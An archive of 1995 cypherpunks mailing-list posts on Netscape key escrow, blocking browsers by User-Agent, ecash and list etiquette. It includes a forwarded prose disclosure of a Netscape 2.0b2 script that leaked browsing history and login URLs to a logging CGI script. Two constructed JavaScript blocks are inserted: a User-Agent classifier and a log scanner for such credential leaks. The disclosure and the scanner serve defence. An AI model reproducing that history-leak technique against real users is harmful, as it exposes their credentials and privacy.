The question is whether there was false representation of the security of
the product.
1. The general knowledge of encryption and secure electronic financial
transactions is significantly lower than that of more standard
transactions.

2. Applying for a loan or buying a car involve actively going out, negotiating,
signing contracts, etc. It will be much simpler to simply stick your vital
info into a 'secure' browser.

3. The choice of browser to use will be done, based on representations by
companies about the security of their product. If Netscape doesn't explicitly
state in direct terms when accessing the browser that the GAK is a
potential security risk, then they will be sued. Simply because someone
will get blamed.

Since they (or again any company that incorporates GAK.. I really don't
want to target Netscape in specific) will make the threat sound as
insignificant as possible, and not bring it to people's attention (and they
can't afford to do so) when (not if) it is breached they will be taken to
court repeatedly.

>
>EBD

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Sat, 2 Dec 1995 04:26:40 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <9512011943.AA29646@bksss1.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


If Alice is so afraid of using PGP, then he's sending his messages through
the remailer chain unencrypted (if it even goes through a chain).  In that
case, the FIRST remailer knows who Alice is... it sees his message, the final
destination, and Alice's real address.

rgds-- TA  (tallard@frb.gov)                                            +-+
I don't speak for the Federal Reserve Board, it doesn't speak for me.   |X|
pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6  DE 14 25 C8 C0 E2 57 9D       +-+
              

-----BEGIN PGP SIGNATURE-----
Version: 2.7

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Sat, 2 Dec 1995 05:57:23 +0800
To: cypherpunks@toad.com
Subject: Updated lists
Message-ID: <199512012043.OAA00733@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

For those of you that use the Mixmaster type2.list and pubring.mix
from vishnu.alias.net for your mixmaster clients, I have just made
some changes to these files on vishnu. You may want to update
accordingly.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Sat, 2 Dec 1995 09:03:23 +0800
To: cypherpunks@toad.com
Subject: Re: Aware's radiation detector
In-Reply-To: <Pine.3.89.9512011612.A29760-0100000@tesla.cc.uottawa.ca>
Message-ID: <199512012258.OAA17955@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> This month's Scientific American has an ad by Aware for that serial port
> radiation detector we were discussing a while back. Upper right corner
> of page 109, I think. Sells for $149 US, 45 day money back guaranty.

This wouldn't be the wavelet company in Cambridge, MA, would it?

Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Sat, 2 Dec 1995 04:54:07 +0800
To: cypherpunks@toad.com
Subject: available news/mail filtering
Message-ID: <199512012001.PAA01825@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


What news and mail filter programs are available?  Pointers
will be appreciated.

If inclined, please give some pros/cons of your favorites.

Thank you for your help in this matter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Sat, 2 Dec 1995 05:16:45 +0800
To: "'cypherpunks@toad.com>
Subject: Browser Reports
Message-ID: <01BABFFE.EE4F9020@loki>
MIME-Version: 1.0
Content-Type: text/plain


Microsoft's Browser (my choice right now) reports:

If you want to know what yours reports, check out http://www.sanchez.com/tt.htp
 
Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (Leslie Todd Masco)
Date: Sat, 2 Dec 1995 05:18:55 +0800
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
Message-ID: <199512012016.PAA26079@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 1 Dec 1995, Ed Carp wrote:

> I believe that Netscape uses "Mozilla" as their keyword when 
> exchanging browser-specific information.

An interesting side-effect:

It seems that the Microsoft browser also sends "Mozilla".
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBML9iryoZzwIn1bdtAQHrkwF5AQ/6ldj1MG7JA05l7wOJw5MebvCvGEok
zTfJg30NjNK8MLStXz2fGuDhMMs2ZIHJ
=VVSJ
-----END PGP SIGNATURE-----
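An added example, not part of any post in this thread: a User-Agent classifier showing why matching on the "Mozilla" keyword alone, as discussed in the messages above, also catches the Microsoft browser. Only the MSIE string is taken from the list; the other sample strings and all function names are constructed for illustration.

```javascript
// Parse the leading "Product/Version (field; field; ...)" token of a
// User-Agent header value. Returns null when the value has no such token.
function parseUserAgent(ua) {
  const m = /^\s*([^\/\s]+)\/(\S+)(?:\s*\(([^)]*)\))?/.exec(ua || '');
  if (!m) return null;
  const fields = m[3]
    ? m[3].split(';').map((s) => s.trim()).filter(Boolean)
    : [];
  return { product: m[1], version: m[2], fields };
}

// Classify one header value. "naive" is what a plain substring test for
// "Mozilla" would conclude; "family" uses the parsed structure instead.
// The header is chosen by the client, so even the structured result is
// only a claim ("netscape-claimed"), never proof of which browser is in use.
function classify(ua) {
  const naive = /mozilla/i.test(ua || '');
  const p = parseUserAgent(ua);
  if (!p) return { naive, family: 'unknown', detail: null };
  if (p.product.toLowerCase() !== 'mozilla') {
    return { naive, family: 'other', detail: p.product + '/' + p.version };
  }
  if (p.fields.length > 0 && p.fields[0].toLowerCase() === 'compatible') {
    // A different browser announcing itself as Mozilla-compatible.
    return { naive, family: 'mozilla-compatible', detail: p.fields[1] || null };
  }
  return { naive, family: 'netscape-claimed', detail: 'Mozilla/' + p.version };
}

// Count how many clients the naive test would label as Netscape versus
// how the structured classification splits them.
function summarize(userAgents) {
  const summary = { naiveMozilla: 0, byFamily: {} };
  for (const ua of userAgents) {
    const c = classify(ua);
    if (c.naive) summary.naiveMozilla += 1;
    summary.byFamily[c.family] = (summary.byFamily[c.family] || 0) + 1;
  }
  return summary;
}

const SAMPLE_AGENTS = [
  'Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)', // as reported on the list
  'Mozilla/2.0b2 (X11; I; Linux 1.2.13 i586)',       // constructed sample
  'Lynx/2.4.2 libwww/2.14',                          // constructed sample
  '',                                                // header absent
];

console.log(summarize(SAMPLE_AGENTS));
```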




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 2 Dec 1995 05:37:00 +0800
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
In-Reply-To: <199512012008.MAA01222@netcom23.netcom.com>
Message-ID: <199512012028.PAA08954@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> (2) You want to inform the public and put pressure on Netscape, not piss
> off the people using netscape browsers.  A quick, one page, detour would
> seem appropriate, but not denial of access or other hostile acts.

I favor putting a GIF and text on the top of every page saying 

  BIG BROTHER INSIDE YOUR BROWSER [Insert nasty logo here.]  You are
  apparently using Netscape, the browser that intentionally lets
  people tap your communications. For more information, click
  _here_. To download a better browser now that doesn't have Big
  Brother Inside, click _here_. To send e-mail to the CEO of Netscape
  telling him how upset this makes you, click _here_.

You can get your server to simply put that at the top of every page
served to a Netscape client, followed by a horizontal line and the
normal web page. It should be easy to put together the hacks to do
that and get them out to lots of people. Watch how fast people would
switch from Netscape, especially were it widely deployed. You would
then watch a fast fall in Netscape stock, which would likely piss Jim
Clark off far more than anything else one could do.

We need HTML 3.0 capable browsers for all platforms, though.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Sat, 2 Dec 1995 05:57:25 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: [NOISE] Barring access to Netscape
Message-ID: <199512012041.PAA29577@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 14:26 12.01.1995 -0500, Robert A. Rosenberg wrote:
>If you want to see one way of locking out Netscape users, check out this
>URL which points at a Web Page that will not allow access by Netscape Users

Just a personal note... while I am strongly in favour of security, this
seems rather petulant and knee-jerkish.

JeffW: Please add a configuration option to let users override the "Mozilla"
ident, so that they can continue to use Netscape at all sites.  I personally
won't use the override, though; if a site is going to insist on trying to
frivolously exclude me as a user based on nothing but the browser I choose to
use, they aren't serious anyway.

>(the guy is ticked off at them trying to establish their own standards) -

The _market_ establishes standards (been proven time and time again).  His
reaction sounds pretty childish to me, but YMMV...

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graeme Cross <graeme@chem2.chem.swin.edu.au>
Date: Fri, 1 Dec 1995 14:46:37 +0800
To: cypherpunks@toad.com
Subject: Netscape 2.0b2 allows for invasion of privacy (fwd)
Message-ID: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



Talking of Netscape - this posting prompted me to forward it given the 
security and privacy implications inherent in the problem.

Cheers
Graeme

------- Start of forwarded message -------
>From: Scott Weston <scott@tripleg.com.au>
>Subject: Netscape 2.0b2 allows for invasion of privacy
>Newsgroups: aus.net.announce,comp.privacy
>Date: Fri, 01 Dec 1995 11:09:06 +1100

Hi 'Net Dwellers,

First off - I've posted this before (however not to this group) and only
got a response from the Netscape Corp.  They were glad I found the
problem and said that they would fix it, however I feel that people
should know about it.  Also I would like people to help me spread this
document around, i.e. if you know of a newsgroup (or people) that would
find this interesting then please re-post it.

On with the problem...

I've recently got hold of the latest netscape, and was (at first) very
excited about the new "LiveScripts" that it supports.  If people don't
yet know - these "LiveScripts" allow you to put small programs into your
web page that is then executed by the Netscape client.  There is no
DIRECT way for these programs to send information back to the owner of
the web page, however I was able to do it in a not-so-direct way.

The "LiveScript" that I wrote extracts ALL the history of the current
netscape window.  By history I mean ALL the pages that you have visited
to get to my page, it then generates a string of these and forces the
Netscape client to load a URL that is a CGI script with the QUERY_STRING
set to the users History.  The CGI script then adds this information
to a log file.  Now if this hasn't quite CLICKED yet let's do a little
example.

Johnny Mnemonic starts up his newly acquired version of Netscape2.0b2
to start his daily "surf" session.  First he decides to check his CD-NOW
purchase and uses the handy Auto-Login URL.  Then he decides to go to
Lycos and do a search.  In his search he finds my page, which he decides
to visit.  Suddenly he is transported, not to my main page but to one
of my CGI scripts, which in turn happens to have ALL the URLs he has just
been to in it.  This means that in my log will be:

  - the URL to use to get into CD-NOW as Johnny Mnemonic, including
    username and password.
  - The exact search params he used on Lycos (i.e. exactly what he
    searched for)
  - plus any other places he happened to visit.

I do this in a way that the user will KNOW that it has happened and
will _hopefully_ email Netscape and tell them they are NOT impressed.
But it would be EASY for me to change the CGI script so that the user
is unaware that it has actually happened, unless they closely examine
their URL history (in fact they'll probably just think it's a netscape
bug).


If you're skeptical about this then do the test yourself.  Get netscape
2.0b2 and do some normal surfing, and then go to Lycos.  Do a search for:

  scotts car boot sale

which should return the URL - http://www.tripleg.com.au/staff/scott

Click on the URL and sit back and watch.  First my main page will show up
but a little while later you should be transported to a CGI bin script
that will show you your URL history.

I have tested this with both the Linux 2.0b2, and Solaris 2.0b2 versions
and both have done the same thing.  I would be interested in knowing if
it happens for ALL versions of Netscape2.0b2.  The log file does log
the User Agent (i.e. the name of the platform you are using) so by simply
going to the page I will know that your version of Netscape is also
open to this form of attack.

Currently I can find no way to configure Netscape2.0b2 to NOT run
LiveScripts - and at the very least this option should be quickly
added to the next version of netscape to be released.  But a far
better solution (IMHO) would be for netscape to pop up a window before
running the LiveScript and let you know what the LiveScript wants access
to, e.g. if it only wants to print out the current time then that's
OK, but if it wants to read my history list and then transport me to
a CGI script and add me to a logfile then maybe I would say NO.

I think I've said enough....

If you've got any further questions, or want some more information just
email me : scott@tripleg.com.au

-- 
Scott.

Quote from a car accident insurance claim: "I told the police that I was
not injured, but on removing my hat, I found that I had a skull fracture."
------- End of forwarded message -------
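An added example, not part of the forwarded post: a log check a site operator could run to spot requests whose query string carries a list of visited URLs, the pattern the post describes, and to redact any credentials before the finding is stored. The Common Log Format input, the script path, the comma separator, the credential parameter names and all sample values are assumptions constructed for illustration.

```javascript
// Constructed sample lines in Common Log Format; hosts, paths and values are made up.
const SAMPLE_LOG = [
  '192.0.2.10 - - [01/Dec/1995:11:09:06 +1100] "GET /staff/index.html HTTP/1.0" 200 2048',
  '192.0.2.10 - - [01/Dec/1995:11:09:21 +1100] "GET /cgi-bin/hist?http%3A%2F%2Fshop.example%2Flogin%3Fuser%3Djohnny%26password%3Dhunter2,http%3A%2F%2Fsearch.example%2Ffind%3Fquery%3Dcar+boot+sale HTTP/1.0" 200 512',
  '192.0.2.77 - - [01/Dec/1995:11:12:40 +1100] "GET /cgi-bin/search?q=http+proxy+setup HTTP/1.0" 200 900',
  '192.0.2.78 - - [01/Dec/1995:11:13:02 +1100] "GET /cgi-bin/go?url=http%3A%2F%2Fmirror.example%2Fpub%2F HTTP/1.0" 302 0',
];

const CLF = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+/;
// Assumed parameter names that usually carry login details.
const CREDENTIAL_PARAM = /^(user(name)?|login|pass(word|wd)?|pw|token)$/i;

// Decode a raw query string; malformed escapes are kept as-is instead of throwing.
function decodeQuery(raw) {
  const spaced = raw.replace(/\+/g, ' ');
  try {
    return decodeURIComponent(spaced);
  } catch (e) {
    return spaced;
  }
}

// Split a decoded query into the absolute URLs embedded in it, whatever
// separator was used between them.
function embeddedUrls(decoded) {
  const hits = decoded.match(/https?:\/\/.*?(?=https?:\/\/|$)/gi) || [];
  return hits.map((u) => u.replace(/[\s,;|]+$/, ''));
}

// Replace userinfo and credential-like parameter values so the report
// does not become a second copy of the leaked secrets.
function redact(urlText) {
  let u;
  try {
    u = new URL(urlText);
  } catch (e) {
    return { text: urlText, secret: false };
  }
  let secret = false;
  if (u.username || u.password) {
    u.username = 'REDACTED';
    u.password = '';
    secret = true;
  }
  for (const key of [...u.searchParams.keys()]) {
    if (CREDENTIAL_PARAM.test(key)) {
      u.searchParams.set(key, 'REDACTED');
      secret = true;
    }
  }
  return { text: u.toString(), secret };
}

// Flag requests whose query string holds at least minUrls absolute URLs.
// A single embedded URL is common (redirectors), so it is not flagged.
function findHistoryLeaks(lines, minUrls = 2) {
  const findings = [];
  for (const line of lines) {
    const m = CLF.exec(line);
    if (!m) continue;
    const [, client, when, , target] = m;
    const q = target.indexOf('?');
    if (q < 0) continue;
    const urls = embeddedUrls(decodeQuery(target.slice(q + 1))).map(redact);
    if (urls.length < minUrls) continue;
    findings.push({
      client,
      when,
      script: target.slice(0, q),
      urls: urls.map((u) => u.text),
      credentialUrls: urls.filter((u) => u.secret).length,
    });
  }
  return findings;
}

console.log(JSON.stringify(findHistoryLeaks(SAMPLE_LOG), null, 2));
```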





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 2 Dec 1995 07:14:24 +0800
To: iang@cs.berkeley.edu
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <49j0sq$a69@calum.csclub.uwaterloo.ca>
Message-ID: <199512012201.RAA25506@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg writes:
>People pay by sending:
>{
>A payment made out to "@" (the ecash wildcard)
>Their choice of lottery ticket number
>A PGP Public key
>}
>encrypted with the lottery's public key, to the remailer address.

You still have the problem that the lottery agency gets to hold the
money until after the drawing.  It's reasonable to expect that they'll
eventually take advantage of their anonymity to just skip the drawing
and abscond with the bucks.  There's some incentive for them to *not*
do this on the first few drawings, but only so they can get a good
enough reputation so when they *do* skip, they'll get a lot more
money.

The problem with this whole scheme is that there has to be some
*non-*anonymous party to enforce the contract.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Twain Ecash Support" <mtwain@netcom.com>
Date: Sat, 2 Dec 1995 07:57:20 +0800
To: cypherpunks@toad.com
Subject: DigiCash releases protocol specs!
Message-ID: <199512012222.OAA18230@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


By popular request, DigiCash is releasing the protocol specs.

The specs are available at 
http://www.digicash.com/ecash/protocol.html

Please be aware that the document is a work in progress. More 
specifications, including byte level descriptions of the message 
format will be added throughout the weekend.

--Lucky Green at

-- Mark Twain Ecash Support
   <mailto:support@marktwain.com>
   <http://www.marktwain.com/ecash.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 2 Dec 1995 08:40:52 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: GAK, Netscape, CyberDog, and you.
Message-ID: <v02120d04ace52054146b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:45 PM 12/1/95, Rich Salz wrote:
>And my god,
>five lists this time, at least some of which have over a thousand readers?

Ouch! Actually, semper.fi has many times that many readers... ;-).

Rich, you must be the *only* person, (besides myself), who's subscribed to
*all* of those lists. I think if you check it out, that post was germane
to every single one of the lists in question.

However, I'm sorry to bury you in a snowstorm. Getting 6 copies of the same
thing must have pissed you off, and for that, I apologise.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 2 Dec 1995 08:39:01 +0800
To: semper.fi@solutions.apple.com
Subject: Attribution: GAK, Netscape, CyberDog, and you.
Message-ID: <v02120d09ace5250c303d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In the heat of the moment, I failed to attribute something to someone who
you all should know about: Tim May, one of the founders of cypherpunks, and
the person who used a greatly expanded form of this argument yesterday on
that list.

While I'm not a journalist, I did violate the rules of "News 101", and did
not attribute the source of this excellent argument. Heavy lifting, indeed.

Of course, that's nothing new. I don't believe I've ever had an original
thought in my life...

;-).

Cheers,
Bob Hettinga

P.S. Sorry, Rich, but I just had to do this one...


>Netscape's Jim Clark has quite a tightrope act going. He has a stock price
>which gives Netscape a P/E ratio of something like 7,000 (the S&P average
>right now is about 14), which means he really ought to get some revenue in
>the door, or his investors are going to have his hide. The next thing is,
>the government is a *really* big customer, and *they* want GAK, in case you
>haven't noticed. ;-). Couple this with the fact that Netscape is pretty much
>replicable by concentrated developer effort because its underlying
>technology is an open standard, *and* the fact that any significant attempt
>by them to create any real proprietary standards on the internet is
>practically impossible in the long run, unless they get a whole lot of very
>big customers in a hurry.
>
>Now, it looks like that's what happened already, because a lot of very
>large companies have signed on to using Netscape servers, but you can also
>see how really weak Netscape's position is when Uncle Sam knocks on their
>door and asks for a key escrow "bug" in every "secure" Netscape web session.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML92Q/gyLN8bw6ZVAQF1KQQAkqsgQJ/u9123iqLzYuduTbz6uQJtUuSQ
q5DQY/3mwGMqwoXHgWnKkx3gsT0kAZwYWIUTaKB81S7GNsgrTtqabhAy+WlemACT
7bw1TbxRL80GKXSiSfeb1BdCyUyi/yfFO6zB3m8wWB4632Bpo5RqQEd1+jCHmDgw
JHo6plE8oQ0=
=/Kd2
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 2 Dec 1995 06:43:44 +0800
To: cypherpunks@toad.com
Subject: Aware's radiation detector
Message-ID: <Pine.3.89.9512011612.A29760-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


This month's Scientific American has an ad by Aware for that serial port
radiation detector we were discussing a while back. Upper right corner
of page 109, I think. Sells for $149 US, 45 day money back guaranty.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 2 Dec 1995 09:07:27 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Barring access to Netscape
In-Reply-To: <199512010802.AAA09494@blob.best.net>
Message-ID: <199512012300.SAA26991@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"James A. Donald" writes:
>At 12:32 AM 12/1/95 +0600, Ed Carp wrote:
>>If you want to bar access to your site from a Netscape browser, such 
>>can easily be accomplished.  If memory serves, every browser, when 
>>connecting to a site, exchanges certain information about the client 
>>with the server.  One can gain access easily to that information.
>
>This would not be satisfactory in itself: Ideally one would like to bring
>up a page saying  "Sorry, you cannot access that page because you
>are using a netscape browser:  Click *here* for the sad tale of
>Netscape.

Just make all the URLs on the server point to a CGI script.  The script
would check the requesting browser's id and return the real data or the
"sorry" message.  This would allow the process to be done with *no*
server changes.

Since "Cypherpunks write code", one can easily imagine a hack to the
Apache or NCSA or CERN servers that did the same thing without having
the overhead of a CGI script for each access.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 1 Dec 1995 08:14:48 +0800
To: sameer <sameer@c2.org>
Subject: Re: "Got a subpoena?"
In-Reply-To: <199511301946.LAA12448@infinity.c2.org>
Message-ID: <Pine.BSF.3.91.951201171205.5743A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, sameer wrote:

> > 
> > What about a court order to (a) start comprehensive logging, and (b) not
> > tell anyone under penalty of ______ .

I am unaware of any authority for such an order.
> 
> 	Aren't court orders part of the public record? I don't quite

Yes, but court orders can be sealed pending further order of the court.

> know how this would work. I don't think they can keep me from telling
> people that I've started comprehensive logging, or at least keep it
> from being found out. (Legally, that is. I'm sure they could always
> use an approach like threatening to audit me every year, threatening
> my family, etc.)
> 
> -- 
> sameer						Voice:   510-601-9777
> 

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 2 Dec 1995 08:19:56 +0800
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <v02120d00ace510ca1c12@[157.22.240.13]>
Message-ID: <Pine.BSF.3.91.951201171025.28141A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Jonathan Zamick wrote:

> >If they tell you about it and you buy it anyway -- tough luck.
> >
> >
> >Same with the cars.  Would *you* buy Pinto with explosives in it????
> >(leaving aside the "inherently dangerous" argument for the moment on the
> >products liability claim).
> >
> >EBD
> 
> Hmm. The key point is that almost no general users will have a clue what
> actual security is, and what GAK is. They _might_ understand the risks of
> having an explosive in their vehicle (but can just as easily argue it wasn't
> properly designed if it went off improperly.) Regardless of what they'd know
> about their vehicle, they can easily claim to have had the risks associated with
> GAK improperly represented, Netscape misleading them with deceptive claims
> of security given this potential hole etc.

And thus we return to my original point, which is that it will depend on 
what is said/disclosed.  If every copy of GAKscape had a banner, bigger 
than the Netscape "N" which said, "The government can read every message 
you send using this software no matter what you do" then I think 
consumers will be hard pressed to say they weren't warned.

> 
> I'm not saying whether or not this is the case, but we are very much in a
> legal period where individuals are in fact expected not to need common sense,
> and corporations are responsible for cleaning up after consumer stupidity.
> 
> It is certainly true that given the general state of education regarding
> crypto, the average consumer can easily say that regardless of warnings about
> GAK, that they weren't properly informed of the risk. With all the hype
> around security, Netscape and encryption people will be under the
> impression regardless of one little disclaimer tag, that their
> information is safe. Neither
> government nor corporations will disabuse them of this belief. The case
> would be strong against them as a consumer.

I disagree.  Almost nobody reads the fine print on the back of a note you 
sign when you buy a car or otherwise take out a loan, but the provisions 
are generally enforceable ...  Ignorance is not necessarily an excuse.

> 
> Jonathan
> 
> ------------------------------------------------------------------------
> ..Jonathan Zamick                    Consensus Development Corporation..

EBD


Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 2 Dec 1995 09:54:40 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: A "Warning Banner" for Netscape Navigator? Good idea!
In-Reply-To: <ace4d9270f0210047e2d@[205.199.118.202]>
Message-ID: <199512020122.RAA24017@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
Timothy C. May writes:

> One patch I'd pay money to have is one which intercepts the "commercials"
> Netscape blasts out at us and replaces them with something else (maybe
> nothing, maybe a "quote for the day," maybe something from a
> user-selectable file of items).
> 
> I understand that Netscape is collecting money for these "commercials," and
> that they control what is sent out. So, any such patch to intercept/remove
> these commercials would have to be done locally. Can this be done?

You can fix this from the browser.
Pull down the 'Options' menu, grab the 'Window and Link styles'
page, and change the default "home page location" from
netscape's to whatever you want.  I usually use my own home page.
I never look at Netscape's pages unless I specifically want to
see something like SSL specs.  If there wasn't a way to
turn off their home page I'd be pretty pissed off.

The description above is from the 1.1 browser; the 2.0x ones are
fairly similar.



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
 Redistribution of this message without the author's permission is forbidden!
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Dec 1995 09:23:29 +0800
To: rsalz@osf.org>
Subject: Too much crossposting! Choose your community and stop crossposting.
Message-ID: <ace4d54c0e021004966b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Note: I'm not subscribed to any of the lists here except the Cypherpunks
list, which I've of course been on for several years, since the start in
'92. I try to avoid cross-posting to multiple lists, and almost never to
lists I am not a subscriber to. (Cypherpunks gets enough spams from
well-meaning folks and groups who simply must have their announcements
blasted out to all the lists they think are important.)

In this case, I am leaving all of the cc: lists on this message, which is a
meta-message. (Hopefully some of the lists block messages from
non-subscribers, which will mean those readers won't see this.)

At 9:30 PM 12/1/95, Robert Hettinga wrote:
>At 12:45 PM 12/1/95, Rich Salz wrote:
>>And my god,
>>five lists this time, at least some of which have over a thousand readers?
>
>Ouch! Actually, semper.fi has many times that many readers... ;-).
>
>Rich, you must be the *only* person, (besides myself), who's subscribed to
>*all* of those lists. I think if you check it out, that post was germane
>to every single one of the lists in question.
>
>However, I'm sorry to bury you in a snowstorm. Getting 6 copies of the same
>thing must have pissed you off, and for that, I apologise.

Bob Hettinga often has some good things to say (though his journalist-style
prose can get a bit purple at times, but that's just his style). However, a
lot of folks have good things to say at times, and clearly these good
things cannot be bounced around to all the lists which might contain
readers of these good things.

Mailing lists simply cannot survive if these kinds of cross-posts to four,
five, or even six different lists continue. Filters are nice, though I
don't relish putting Bob H. into a kill-file.

People pick the mailing lists, the communities, they wish to participate
in. This means they are electing not to read the traffic of other lists.
C'est la vie.

Even worse, massive cross-posting often produces follow-ups--such as mine
here--which are "out of synch" with the themes of the particular lists.
Thus, on the Cypherpunks list we sometimes get cross-posts which argue why
privacy is or is not a good thing. Perhaps a reasonable thing to argue, but
not on Cypherpunks. I'm sure the other lists here have had similar
experiences.

I urge everyone to practice some restraint.

--Tim May, who has a hard enough time reading the traffic on Cypherpunks
and Cyberia-l (legal issues in cyberspace) without getting traffic on
CyberHound, WWW-BUYNOW, etc.


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






